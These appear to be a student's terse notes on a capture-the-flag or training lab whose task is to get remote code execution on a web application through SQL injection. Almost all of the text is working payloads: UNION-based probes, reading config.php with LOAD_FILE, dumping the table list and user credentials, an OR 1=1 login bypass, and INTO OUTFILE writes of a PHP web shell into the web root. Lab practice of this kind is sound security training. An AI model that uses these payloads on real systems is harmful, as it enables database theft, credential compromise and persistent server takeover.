Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
' UNION SELECT 1,2,3,4,5-- -
' UNION SELECT 1,@@version,3,4,5-- -
' UNION SELECT 1,user(),3,4,5-- -
' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3,4,5-- -
' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -
So we don't have rights, i guess i have to switch users:
' UNION select 1,database(),3,4,5-- -
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
' UNION select 1,username,password,4,5 from ilfreight.users-- -
let's go and connect as adam with the command adam'OR 1=1-- -
cn' union select 1,'<?php system($_REQUEST[0]); ?>',3,4,5 into outfile '/var/www/html/dashboard/payload.php'-- -
